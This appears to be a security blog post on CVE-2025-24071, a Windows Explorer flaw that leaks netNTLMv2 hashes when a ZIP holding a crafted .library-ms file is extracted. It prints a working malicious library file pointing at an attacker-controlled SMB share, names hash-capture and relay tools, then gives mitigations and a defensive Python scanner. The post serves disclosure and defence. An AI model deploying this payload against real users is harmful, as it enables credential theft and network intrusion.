CVE-2025-24071 - Filter netNTLMv2 Credentials with a simple ZIP
In this blog post, a proof-of-concept (PoC) is presented that demonstrates how a malicious .library-ms file can be used to capture netNTLMv2 credentials without the need for the victim to interact with the file. Simply unzipping the file is enough to trigger the vulnerability.
Vulnerability Description
Vulnerability CVE-2025-24071 is a critical flaw in Windows Explorer, the default file manager of the Windows operating system. This vulnerability arises from insecure behaviour in the handling of compressed (ZIP) files containing a Windows library file with a .library-ms extension. When a user unzips a malicious ZIP file, Windows Explorer automatically processes the embedded .library-ms file, which triggers a Server Message Block (SMB) connection to a remote server controlled by an attacker.
The most concerning aspect of this vulnerability is that it does not require any user interaction (e.g. clicking on the file), as the malicious action is executed in the background during decompression. As a result, the victim’s system sends its authentication credentials in netNTLMv2 format to the attacker, which could allow the attacker to perform an authentication relay attack (NTLM Relay) or to attempt to recover the password from the captured hash by brute force.
Potential impact:
- Credential theft: An attacker could capture NTLMv2 hashes and, in environments with weak password policies, crack them offline.
- Lateral movement on corporate networks: If the affected user has privileges on an internal network, the attacker could escalate access.
- Remote Code Execution (RCE): In combination with other vulnerabilities, RCE could be achieved.
Proof of Concept (PoC)
1. Preparation of the Malicious File
To exploit this vulnerability, we must first create a .library-ms file with the following malicious XML content:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\192.168.0.1\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
This XML file contains a reference to a remote SMB resource (\\ATTACKER-IP\shared; 192.168.0.1 in the example above) that the system will automatically try to contact when the file is processed by Windows Explorer. We then compress this file in ZIP format for distribution.
2. Distribution and Execution
The attack vector is surprisingly simple: the attacker distributes the ZIP file to the victim via any means (email, messaging, download sites, etc.). What is critical about this vulnerability is that it does not require the user to open the malicious file. By simply unzipping the ZIP, Windows Explorer automatically processes the contained .library-ms file, attempting to establish an SMB connection to the server controlled by the attacker.
3. Credential Capture
On the attacker’s server, an SMB listener is configured using tools such as responder, ntlmrelayx or Inveigh to intercept and log the netNTLMv2 hashes sent by the victim’s system during the authentication attempt. These hashes can subsequently be:
- Subjected to brute-force attacks to recover the password in clear text.
- Used in NTLM Relay attacks to escalate privileges or move laterally in the network.
- Exploited to establish authenticated sessions on systems that accept this type of authentication.
Mitigation
To protect systems against the vulnerability CVE-2025-24071, the following measures are recommended:
- Install security updates: Immediately apply the security patches released by Microsoft for this specific vulnerability.
- Configure group policies:
  - Block outbound SMB in corporate environments where possible.
  - Implement firewall rules that block unauthorised outbound SMB connections.
- Good security practices:
  - Avoid unzipping ZIP files from untrusted sources.
  - Use up-to-date anti-virus solutions that can detect these types of threats.
  - Consider using isolated environments to examine suspicious files.
- Network monitoring: Implement intrusion detection systems capable of identifying attempts to exploit this vulnerability.
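The library description format shown in the PoC section and the "examine suspicious files in an isolated environment" advice above can be combined into a simple pre-extraction check: open the archive without extracting it, parse every .library-ms member, and flag any <url> element that points at a UNC host rather than a local folder. The following scanner is an added example written for this article; it is not code from the original post nor from the referenced PoC. The 1 MB size cap, the trusted_hosts allowlist and the member names in the constructed sample archive are assumptions made here for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by Windows library description files (.library-ms), as in the XML shown above.
LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"

# Matches a UNC path (\\host\share or just \\host) and captures the host part.
UNC_RE = re.compile(r"^\\\\([^\\]+)(?:\\|$)")

# Assumption (not from the page): largest .library-ms member we are willing to parse.
MAX_LIBRARY_MS_BYTES = 1_000_000


def find_unc_hosts(library_xml: bytes) -> list[str]:
    """Return the hosts of all UNC paths found in <url> elements of a .library-ms document.

    A local path such as C:\\Users\\Public is not a UNC path and is ignored. Unparseable
    content yields an empty list; a caller may still treat a malformed file as suspicious.
    """
    try:
        root = ET.fromstring(library_xml)
    except ET.ParseError:
        return []
    hosts = []
    for url in root.iter(LIBRARY_NS + "url"):
        match = UNC_RE.match((url.text or "").strip())
        if match:
            hosts.append(match.group(1))
    return hosts


def scan_zip(zip_bytes: bytes, trusted_hosts: tuple[str, ...] = ()) -> list[dict]:
    """Flag every .library-ms member whose <url> points at a UNC host not in trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for member in archive.infolist():
            if not member.filename.lower().endswith(".library-ms"):
                continue
            if member.file_size > MAX_LIBRARY_MS_BYTES:
                findings.append({"member": member.filename, "host": None, "reason": "oversized"})
                continue
            for host in find_unc_hosts(archive.read(member)):
                if host.lower() not in trusted:
                    findings.append({"member": member.filename, "host": host, "reason": "unc-url"})
    return findings


# Constructed sample: the library description from the PoC section, pointing at the example address.
MALICIOUS_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\192.168.0.1\shared</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed sample: a library that only references a local folder and must not be flagged.
BENIGN_LIBRARY_MS = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>C:\Users\Public\Documents</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""


def build_sample_zip() -> bytes:
    """Build an in-memory ZIP holding one malicious and one benign .library-ms plus a text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("invoice.library-ms", MALICIOUS_LIBRARY_MS)
        archive.writestr("docs/local.library-ms", BENIGN_LIBRARY_MS)
        archive.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        print(finding)
```

Running the block prints one finding for invoice.library-ms with host 192.168.0.1; the member that only references a local folder produces nothing. The scan reads members from the archive in memory, so Windows Explorer never processes the library file. The standard-library XML parser is used for brevity; for files from untrusted sources in production, a hardened parser such as defusedxml is the safer choice.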
Microsoft has classified this vulnerability as critical and recommends updating all affected systems with high priority.
Conclusion
Vulnerability CVE-2025-24071 highlights the importance of keeping systems up-to-date and being cautious when handling compressed files from unknown sources. Exploitation of this vulnerability can occur without the user directly interacting with the exploit.
References
- Microsoft Security Response Center: CVE-2025-24071 - Official details of the vulnerability and available patches.
- Proof of Concept by 0x6rss on GitHub - Technical implementation of the PoC demonstrated in this article.
- MITRE CVE Details: CVE-2025-24071 - Reference information in the official CVE database.
- NTLM Relay Attacks: A Technical Explanation - Additional resource for understanding the NTLM relay attacks mentioned in the article.